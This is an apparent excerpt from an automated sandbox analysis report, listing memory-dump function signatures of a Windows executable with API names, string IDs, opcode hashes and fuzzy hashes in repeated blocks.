                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CriticalLeaveSection
                                                                                                                                                                              • String ID: 0$Compile error %d at offset %d: %hs
                                                                                                                                                                              • API String ID: 3988221542-2351679343
                                                                                                                                                                              • Opcode ID: 669f7922971e2a12abed5b82d35e66300251db2a6a5d77d1bcfd8d27a54f3054
                                                                                                                                                                              • Instruction ID: e0a9c1a3259e22d9f8201f47920329e5032e5cbd342937295e9f0b490f4b063e
                                                                                                                                                                              • Opcode Fuzzy Hash: 669f7922971e2a12abed5b82d35e66300251db2a6a5d77d1bcfd8d27a54f3054
                                                                                                                                                                              • Instruction Fuzzy Hash: 47219132615A8082EB62CF12F0547DA77A0F78C7E8F544212FB5943BA9DB7DC986CB00
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CriticalLeaveSection
                                                                                                                                                                              • String ID: 0$Compile error %d at offset %d: %hs
                                                                                                                                                                              • API String ID: 3988221542-2351679343
                                                                                                                                                                              • Opcode ID: a64697e608e75743c963295409f36fdf663f82038318541f736e3f0b01c85712
                                                                                                                                                                              • Instruction ID: 93557342ca6019b1540806aef76abb851e53d0ef65082074a5b7e4bea75239c7
                                                                                                                                                                              • Opcode Fuzzy Hash: a64697e608e75743c963295409f36fdf663f82038318541f736e3f0b01c85712
                                                                                                                                                                              • Instruction Fuzzy Hash: 32219132615A8082EB62CF12F0547DA77A0F78C7E8F544212FB5943BA9DB7DC985CB00
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CriticalLeaveSection
                                                                                                                                                                              • String ID: 0$Compile error %d at offset %d: %hs
                                                                                                                                                                              • API String ID: 3988221542-2351679343
                                                                                                                                                                              • Opcode ID: 9d4dce7bd1c8d4e80a28012051c248a3de5bb6e3b3aa01ebcace92755085cd9e
                                                                                                                                                                              • Instruction ID: 60cb311df3463d4b6b60edab0157bdc3386718566dbf2fc0e06a9e816dc89372
                                                                                                                                                                              • Opcode Fuzzy Hash: 9d4dce7bd1c8d4e80a28012051c248a3de5bb6e3b3aa01ebcace92755085cd9e
                                                                                                                                                                              • Instruction Fuzzy Hash: D5218032615A8082EB62CF12F0547DA77A0F78C7E8F544212FB5943BA9DB7DC985CB00
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CriticalLeaveSection
                                                                                                                                                                              • String ID: 0$Compile error %d at offset %d: %hs
                                                                                                                                                                              • API String ID: 3988221542-2351679343
                                                                                                                                                                              • Opcode ID: 072c944db6f3e8afa0c68e46e89b7200b26af6b8689e4ec210f4422cb6713a74
                                                                                                                                                                              • Instruction ID: 95ad26671e152d5bdfff73a9f5d69eb270b56f542cf63d7f44d78f43d5b4835e
                                                                                                                                                                              • Opcode Fuzzy Hash: 072c944db6f3e8afa0c68e46e89b7200b26af6b8689e4ec210f4422cb6713a74
                                                                                                                                                                              • Instruction Fuzzy Hash: DD219132615A8082EB62CF12F0547DA77A0F78C7E8F544212FB9943BA9DB7DC985CB00
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CriticalLeaveSection
                                                                                                                                                                              • String ID: 0$Compile error %d at offset %d: %hs
                                                                                                                                                                              • API String ID: 3988221542-2351679343
                                                                                                                                                                              • Opcode ID: 3d0d71b4a9fdb423627d60bb05a899915990da00d308a0dc3864841c393e6f55
                                                                                                                                                                              • Instruction ID: 8837efef20a4c58fbc5e3a58520a72e5e950f6bf6dbf99ae94e7bf77a8ccd1a0
                                                                                                                                                                              • Opcode Fuzzy Hash: 3d0d71b4a9fdb423627d60bb05a899915990da00d308a0dc3864841c393e6f55
                                                                                                                                                                              • Instruction Fuzzy Hash: 8B219132615A8082EB62CF12F0547DA77A0F78C7E8F544212FB5943BA9DB7DC985CB00
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CriticalLeaveSection
                                                                                                                                                                              • String ID: 0$Compile error %d at offset %d: %hs
                                                                                                                                                                              • API String ID: 3988221542-2351679343
                                                                                                                                                                              • Opcode ID: 74f2e57537486d01f771eadd42b26db3ec567f089cb9e56e28f736706f318977
                                                                                                                                                                              • Instruction ID: 95b04d34fd7b7026c49ba3f39605e61472826972605ea62b5e493cf059d4225c
                                                                                                                                                                              • Opcode Fuzzy Hash: 74f2e57537486d01f771eadd42b26db3ec567f089cb9e56e28f736706f318977
                                                                                                                                                                              • Instruction Fuzzy Hash: 9D219132615A9082EB62CF12F0547DA77A0F78C7E8F544212FB5943BA9EB7DC985CB40
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CriticalLeaveSection
                                                                                                                                                                              • String ID: 0$Compile error %d at offset %d: %hs
                                                                                                                                                                              • API String ID: 3988221542-2351679343
                                                                                                                                                                              • Opcode ID: 15e764317145ba8a7fb8b72692ab67f53e2826a60c280c05d4fe616fa8dcb7aa
                                                                                                                                                                              • Instruction ID: 87a02e866d63d4bef934dccfd88ab42cd6d25feaa45d19db6ea1a8547f6f1c55
                                                                                                                                                                              • Opcode Fuzzy Hash: 15e764317145ba8a7fb8b72692ab67f53e2826a60c280c05d4fe616fa8dcb7aa
                                                                                                                                                                              • Instruction Fuzzy Hash: 96218036615A9082EB62CF12F0547DA77A0F78C7E8F544212FB5943BA9DB7DC985CB00
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CriticalLeaveSection
                                                                                                                                                                              • String ID: 0$Compile error %d at offset %d: %hs
                                                                                                                                                                              • API String ID: 3988221542-2351679343
                                                                                                                                                                              • Opcode ID: d131cd1103d7b490f4736dfd870a79046cef22998b4fdc0ba7c24fc1713085c3
                                                                                                                                                                              • Instruction ID: 04451c00152b8a60380ae8f828e965d42a33dd53c3f6a4da1aaf658b509db279
                                                                                                                                                                              • Opcode Fuzzy Hash: d131cd1103d7b490f4736dfd870a79046cef22998b4fdc0ba7c24fc1713085c3
                                                                                                                                                                              • Instruction Fuzzy Hash: 5E219132615A8082EB62CF12F0547DA77A0F78C7E8F544212FB5943BA9DB7DC985CB00
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CriticalLeaveSection
                                                                                                                                                                              • String ID: 0$Compile error %d at offset %d: %hs
                                                                                                                                                                              • API String ID: 3988221542-2351679343
                                                                                                                                                                              • Opcode ID: 47d54bfe22cad9470ae639a95a18bb399aa6804e1c435c916d7f1bc3bab49acf
                                                                                                                                                                              • Instruction ID: 11f4fa6a6d054b25447a5e8b4561a477a1ceb6490595791b70a4cc0c72399170
                                                                                                                                                                              • Opcode Fuzzy Hash: 47d54bfe22cad9470ae639a95a18bb399aa6804e1c435c916d7f1bc3bab49acf
                                                                                                                                                                              • Instruction Fuzzy Hash: 57219132615A9082EB62CF12F0547DA77A0F78C7E8F544212FB5943BA9DB7DC985CB40
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: KeyboardLayout
                                                                                                                                                                              • String ID: Up$MZ@
                                                                                                                                                                              • API String ID: 194098044-2530889181
                                                                                                                                                                              • Opcode ID: 89170f3ff00f596b50790e25f3942ee966ae2aaa03cc7837ee4cd3370f24f60e
                                                                                                                                                                              • Instruction ID: a879561d6e83a08483e0ec96df4ad232071159ba5886b6b042dcdc377266d1d5
                                                                                                                                                                              • Opcode Fuzzy Hash: 89170f3ff00f596b50790e25f3942ee966ae2aaa03cc7837ee4cd3370f24f60e
                                                                                                                                                                              • Instruction Fuzzy Hash: C921BA726446918AF7229B26A0147FF3FA0B70E3D8F098001FB854BAF5DB3A8089C750
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: KeyboardLayout
                                                                                                                                                                              • String ID: Up$MZ@
                                                                                                                                                                              • API String ID: 194098044-2530889181
                                                                                                                                                                              • Opcode ID: 14d3431bc53e76dd33fd860d604d1f3099c940da3308e8ca8d95e5e518e45e85
                                                                                                                                                                              • Instruction ID: 71347c1a11bb9f878e50990441527e471f863ce67634311162f375959a317cab
                                                                                                                                                                              • Opcode Fuzzy Hash: 14d3431bc53e76dd33fd860d604d1f3099c940da3308e8ca8d95e5e518e45e85
                                                                                                                                                                              • Instruction Fuzzy Hash: CD21BA326446918AF7329B26A0157FB3FA0B70E3D8F098001FB954BAF5DB3A8084CB10
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: KeyboardLayout
                                                                                                                                                                              • String ID: Up$MZ@
                                                                                                                                                                              • API String ID: 194098044-2530889181
                                                                                                                                                                              • Opcode ID: 605c63f595d35901cdacb532a3b325a56d5ce9490ebd0659c6f1a4bc5f7ce372
                                                                                                                                                                              • Instruction ID: e1b7beb6772228f9204b2212ce59fe08a6a68ada74a2c7ba895f23fc0dadb469
                                                                                                                                                                              • Opcode Fuzzy Hash: 605c63f595d35901cdacb532a3b325a56d5ce9490ebd0659c6f1a4bc5f7ce372
                                                                                                                                                                              • Instruction Fuzzy Hash: 1D21BA326446918AF7329B36A5147FA3FA0B30E3D8F498001FB854BAF5DB3A8085C710
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CriticalLeaveSection
                                                                                                                                                                              • String ID: 0$Compile error %d at offset %d: %hs
                                                                                                                                                                              • API String ID: 3988221542-2351679343
                                                                                                                                                                              • Opcode ID: a02998526146843451f2f44f313b3648a924ddf576cdf64acb4f069f9dfd9cc9
                                                                                                                                                                              • Instruction ID: 64002d6fefdc0b6c97c4759af9bc3912821dc4dad987dd8c47c572367fd1397f
                                                                                                                                                                              • Opcode Fuzzy Hash: a02998526146843451f2f44f313b3648a924ddf576cdf64acb4f069f9dfd9cc9
                                                                                                                                                                              • Instruction Fuzzy Hash: 97219F32615A8082EB62CF12F0507DA77A0F78C7E8F544212FB9943BA9DB7DC985CB00
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: KeyboardLayout
                                                                                                                                                                              • String ID: Up$MZ@
                                                                                                                                                                              • API String ID: 194098044-2530889181
                                                                                                                                                                              • Opcode ID: f6ed39c529c31c457e93342ca1beb8e6c6725db95fc6ba34abb2126e69a5535c
                                                                                                                                                                              • Instruction ID: bcb70db04c55c17880515e76da7c9eabae2613bd92fab575cd4f62f11c1a1766
                                                                                                                                                                              • Opcode Fuzzy Hash: f6ed39c529c31c457e93342ca1beb8e6c6725db95fc6ba34abb2126e69a5535c
                                                                                                                                                                              • Instruction Fuzzy Hash: 3521AF326446914AF7329B36A5117FE3FA0B70E3D8F498101FB994BAF5DB3A8085C710
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AcceleratorTable$Destroy$CreateMenulstrcmpi
                                                                                                                                                                              • String ID: Menu does not exist.
                                                                                                                                                                              • API String ID: 4181887075-3388092720
                                                                                                                                                                              • Opcode ID: 7b19d40e7365c54b0069a331a73225f9778c250f7784e71e90345439245e3d68
                                                                                                                                                                              • Instruction ID: a959fd4fc980ffc509ebe7d2e606583ec445b16744e8da5de7f868174898e9a5
                                                                                                                                                                              • Opcode Fuzzy Hash: 7b19d40e7365c54b0069a331a73225f9778c250f7784e71e90345439245e3d68
                                                                                                                                                                              • Instruction Fuzzy Hash: 78210CB5305A4081EA56DB17E8543E963A2B74DFC0F684826EF4E1BB76DF39C4818300
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                              • Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
                                                                                                                                                                              • Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CriticalLeaveSection
                                                                                                                                                                              • String ID: 0$Compile error %d at offset %d: %hs
                                                                                                                                                                              • API String ID: 3988221542-2351679343
                                                                                                                                                                              • Opcode ID: 541b4c50f08e323a021a4f754700379e1c2150621057cf727c2dde5214a22b40
                                                                                                                                                                              • Instruction ID: 93934c26366ccb255cbda80112181d3bfc0c38a6e843d2921c42a222b7e95080
                                                                                                                                                                              • Opcode Fuzzy Hash: 541b4c50f08e323a021a4f754700379e1c2150621057cf727c2dde5214a22b40
                                                                                                                                                                              • Instruction Fuzzy Hash: 02216232615A8096EB62CB12F0007DA67A0F74D7D8F540216FB5D03BB9DB7DC945CB40
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              APIs
